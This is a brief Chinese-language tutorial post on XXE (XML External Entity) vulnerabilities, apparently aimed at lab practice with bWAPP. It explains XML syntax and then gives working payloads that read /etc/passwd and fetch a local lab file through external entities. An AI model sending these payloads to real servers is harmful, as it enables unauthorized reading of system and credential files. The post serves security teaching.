XML External Entity attack

XXE漏洞

XML 被設計用來傳輸和存儲數(shù)據(jù)。

語法規(guī)則

<?xml version="1.0" encoding="UTF-8"?> <!--XML 聲明-->
<girl age="18">  <!--自定的根元素girl;age屬性需要加引導-->
<hair>長頭發(fā)</hair>  <!--自定義的4個子元素,即girl對象的屬性-->
<eye>大眼睛</eye>
<face>可愛的臉龐</face>
<summary>可愛美麗的女孩</summary>
</girl>  <!--根元素的閉合-->

Payload

獲取賬戶密碼:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>

<xxe>&xxe;</xxe>

獲取flag.txt

讀取網(wǎng)站任意文件:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt">
]>

<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

Reference:
《XXE漏洞利用技巧:從XML到遠程代碼執(zhí)行》
《安仔課堂:實戰(zhàn)講解XXE漏洞的利用與防御策略》

*原文地址:https://blog.dyboy.cn/websecurity/65.html

?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容